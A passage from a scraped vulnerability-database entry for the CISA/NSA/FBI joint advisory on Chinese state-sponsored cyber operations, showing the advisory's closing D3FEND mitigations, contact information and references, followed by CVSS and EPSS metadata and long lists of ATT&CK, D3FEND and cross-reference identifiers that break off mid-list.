[[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "published": "2021-08-20T12:00:00", "modified": "2021-08-20T12:00:00", "epss": [{"cve": "CVE-2019-11510", "epss": 0.97334, "percentile": 0.99801, "modified": "2023-05-31"}, {"cve": "CVE-2019-19781", "epss": 0.97475, "percentile": 0.99937, "modified": "2023-06-02"}, {"cve": "CVE-2020-5902", "epss": 0.97567, "percentile": 0.99997, "modified": "2023-05-27"}, {"cve": "CVE-2023-27350", "epss": 0.94375, "percentile": 0.9878, "modified": "2023-05-31"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b&title=Chinese%20State-Sponsored%20Cyber%20Operations%3A%20Observed%20TTPs", "http://twitter.com/intent/tweet?text=Chinese%20State-Sponsored%20Cyber%20Operations%3A%20Observed%20TTPs+https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "mailto:?subject=Chinese%20State-Sponsored%20Cyber%20Operations%3A%20Observed%20TTPs&body=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "https://attack.mitre.org/versions/v8/techniques/enterprise/", "https://d3fend.mitre.org/", "https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders", "https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF", "https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps", "https://github.com/nsacyber", "https://us-cert.cisa.gov/china", "https://www.ic3.gov/Home/IndustryAlerts", "https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/", "http://www.us-cert.gov/tlp/", "https://attack.mitre.org/versions/v9/tactics/TA0043", "https://attack.mitre.org/versions/v9/techniques/T1595", "https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis", "https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1590", "https://attack.mitre.org/versions/v9/tactics/TA0042", "https://attack.mitre.org/versions/v9/techniques/T1583", "https://attack.mitre.org/versions/v9/techniques/T1608", "https://attack.mitre.org/versions/v9/techniques/T1588", "https://attack.mitre.org/versions/v9/techniques/T1588/002", "https://attack.mitre.org/versions/v9/tactics/TA0001/", "https://attack.mitre.org/versions/v9/techniques/T1189", "https://d3fend.mitre.org/technique/d3f:HomoglyphDetection", "https://d3fend.mitre.org/technique/d3f:URLAnalysis", "https://d3fend.mitre.org/technique/d3f:DynamicAnalysis", "https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation", "https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting", "https://d3fend.mitre.org/technique/d3f:DNSDenylisting", "https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1190", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20", "https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF", "https://d3fend.mitre.org/technique/d3f:ApplicationHardening", "https://d3fend.mitre.org/technique/d3f:SoftwareUpdate", "https://d3fend.mitre.org/technique/d3f:FileAnalysis", "https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling", "https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis", "https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1566", "https://attack.mitre.org/versions/v9/techniques/T1566/001", "https://attack.mitre.org/versions/v9/techniques/T1566/002", "https://d3fend.mitre.org/technique/d3f:MessageAuthentication", "https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication", "https://d3fend.mitre.org/technique/d3f:DynamicAnalysis", "https://d3fend.mitre.org/technique/d3f:HomoglyphDetection", "https://d3fend.mitre.org/technique/d3f:URLAnalysis", "https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis", "https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1133", "https://attack.mitre.org/versions/v9/techniques/T1190", "https://attack.mitre.org/versions/v9/tactics/TA0003", "https://d3fend.mitre.org/technique/d3f:SoftwareUpdate", "https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis", "https://d3fend.mitre.org/technique/d3f:PlatformMonitoring", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1078", "https://attack.mitre.org/versions/v9/techniques/T1078/001", "https://attack.mitre.org/versions/v9/techniques/T1078/002", "https://attack.mitre.org/versions/v9/tactics/TA0003", "https://attack.mitre.org/versions/v9/tactics/TA0004", "https://attack.mitre.org/versions/v9/tactics/TA0005", "https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication", "https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis", "https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding", "https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis", "https://attack.mitre.org/versions/v9/tactics/TA0002", "https://attack.mitre.org/versions/v9/techniques/T1059", "https://attack.mitre.org/versions/v9/techniques/T1059/001", "https://attack.mitre.org/versions/v9/techniques/T1059/003", "https://attack.mitre.org/versions/v9/techniques/T1059/004", "https://attack.mitre.org/versions/v9/techniques/T1059/006", "https://attack.mitre.org/versions/v9/techniques/T1059/007", "https://attack.mitre.org/versions/v9/techniques/T1059/008", "https://d3fend.mitre.org/technique/d3f:PlatformHardening", "https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis", "https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting", "https://attack.mitre.org/versions/v9/techniques/T1053", "https://attack.mitre.org/versions/v9/techniques/T1053/003", "https://attack.mitre.org/versions/v9/techniques/T1053/005", "https://attack.mitre.org/versions/v9/tactics/TA0003", "https://attack.mitre.org/versions/v9/tactics/TA0004", "https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring", "https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis", "https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring", "https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis", "https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting", "https://attack.mitre.org/versions/v9/techniques/T1204", "https://attack.mitre.org/versions/v9/techniques/T1204/001", "https://attack.mitre.org/versions/v9/techniques/T1204/002", "https://d3fend.mitre.org/technique/d3f:DynamicAnalysis", "https://d3fend.mitre.org/technique/d3f:FileContentRules", "https://d3fend.mitre.org/technique/d3f:HomoglyphDetection", "https://d3fend.mitre.org/technique/d3f:URLAnalysis", "https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis", "https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation", "https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting", "https://d3fend.mitre.org/technique/d3f:DNSDenylisting", "https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering", "https://attack.mitre.org/versions/v9/tactics/TA0003", "https://attack.mitre.org/versions/v9/techniques/T1574", "https://attack.mitre.org/versions/v9/techniques/T1574/001", "https://attack.mitre.org/versions/v9/tactics/TA0004", "https://attack.mitre.org/versions/v9/tactics/TA0005", "https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting", "https://attack.mitre.org/versions/v9/techniques/T1556", "https://attack.mitre.org/versions/v9/techniques/T1556/001", "https://attack.mitre.org/versions/v9/tactics/TA0005", "https://attack.mitre.org/versions/v9/tactics/TA0006", "https://d3fend.mitre.org/technique/d3f:ProcessAnalysis", "https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding", "https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1505", "https://attack.mitre.org/versions/v9/techniques/T1505/003", "https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling", "https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis", "https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis", "https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1543", "https://attack.mitre.org/versions/v9/techniques/T1543/003", "https://attack.mitre.org/versions/v9/tactics/TA0004", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://attack.mitre.org/versions/v9/tactics/TA0004", "https://attack.mitre.org/versions/v9/techniques/T1484", "https://attack.mitre.org/versions/v9/techniques/T1484/001", "https://attack.mitre.org/versions/v9/tactics/TA0005", "https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis", "https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1055", "https://attack.mitre.org/versions/v9/techniques/T1055/001", "https://attack.mitre.org/versions/v9/techniques/T1055/002", "https://attack.mitre.org/versions/v9/tactics/TA0005", "https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation", "https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl", "https://attack.mitre.org/versions/v9/tactics/TA0005", "https://attack.mitre.org/versions/v9/techniques/T1140", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting", "https://attack.mitre.org/versions/v9/techniques/T1564", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting", "https://attack.mitre.org/versions/v9/techniques/T1070", "https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting", "https://attack.mitre.org/versions/v9/techniques/T1027", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1218", "https://attack.mitre.org/versions/v9/techniques/T1218/005", "https://attack.mitre.org/versions/v9/techniques/T1218/011", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://attack.mitre.org/versions/v9/tactics/TA0006", "https://attack.mitre.org/versions/v9/techniques/T1212", "https://d3fend.mitre.org/technique/d3f:SoftwareUpdate", "https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication", "https://attack.mitre.org/versions/v9/techniques/T1003", "https://attack.mitre.org/versions/v9/techniques/T1003/001", "https://attack.mitre.org/versions/v9/techniques/T1003/003", "https://d3fend.mitre.org/technique/d3f:CredentialHardening", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis", "https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation", "https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl", "https://attack.mitre.org/versions/v9/tactics/TA0007", "https://attack.mitre.org/versions/v9/techniques/T1083", "https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1069", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis", "https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1057", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis", "https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1046", "https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis", "https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1018", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis", "https://attack.mitre.org/versions/v9/tactics/TA0008", "https://attack.mitre.org/versions/v9/techniques/T1210", "https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection", "https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis", "https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl", "https://attack.mitre.org/versions/v9/tactics/TA0009", "https://attack.mitre.org/versions/v9/techniques/T1560", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis", "https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting", "https://attack.mitre.org/versions/v9/techniques/T1115", "https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection", "https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering", "https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1074", "https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis", "https://attack.mitre.org/versions/v9/techniques/T1114", "https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication", "https://d3fend.mitre.org/technique/d3f:MessageEncryption", "https://d3fend.mitre.org/technique/d3f:ProcessAnalysis", "https://attack.mitre.org/versions/v9/tactics/TA0011", "https://attack.mitre.org/versions/v9/techniques/T1071", "https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling", "https://d3fend.mitre.org/technique/d3f:FileCarving", "https://d3fend.mitre.org/technique/d3f:DNSDenylisting", "https://attack.mitre.org/versions/v9/techniques/T1105", "https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1571", "https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling", "https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection", "https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering", "https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering", "https://attack.mitre.org/versions/v9/techniques/T1572", "https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection", "https://attack.mitre.org/versions/v9/techniques/T1090", "https://attack.mitre.org/versions/v9/techniques/T1090/003", "https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection", "https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis", "https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering", "https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps", "http://www.fbi.gov/contact-us/field", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/accessibility", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"], "immutableFields": [], "lastseen": "2023-06-02T15:02:33", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:DCC49204-DEDF-4481-A2E0-9147642F76FB", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": ["AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "cert", "idList": ["VU:290915", "VU:619785", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1097", "CPAI-2019-1653", "CPAI-2020-0628"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2020-5902", "CISA-KEV-CVE-2023-27350"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"]}, {"type": "dsquare", "idList": ["E-688", "E-709"]}, {"type": "exploitdb", "idList": ["EDB-ID:47297", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48642", "EDB-ID:48711", "EDB-ID:51391", "EDB-ID:51452"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "059DC199-E425-50EE-B5F5-E351E0323E69", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0D1A0CBD-B470-5537-BFD1-5E5CC1B66E90", "0F7F6A38-032A-59F3-8E3F-87CF2FA843FE", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D3AD059-4772-527B-A78C-724AFA1B109F", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "31DB22CD-3492-524F-9D26-035FC1086A71", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "66506397-D518-518F-B4A6-3C3F99602E30", "6787DC40-24C2-5626-B213-399038EFB0E9", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "721C46F4-C390-5D23-B358-3D4B22959428", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "7F937E02-A1B2-5F78-B140-90BC298729D4", "88373793-9076-5F05-BDBB-635A7E1BD897", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "9FE15986-BAC9-5740-8189-23E26F8399D5", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A277C369-9867-5831-8B67-94838FA46118", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B417316F-A794-5234-BC9E-475C438FC35C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "CFBF5DCB-CF48-542D-A0B2-0019FFA627FA", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "DC044D23-6D59-5326-AB78-94633F024A74", "DE558F67-26A7-5F03-AD15-C2087B81E69F", "E10677D8-7D8B-50E5-8180-E47060EC7983", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD"]}, {"type": "hackerone", "idList": ["H1:1519841", "H1:591295", "H1:617543", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-133A", "AA20-182A", "AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-321A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-117A", "AA22-131A", 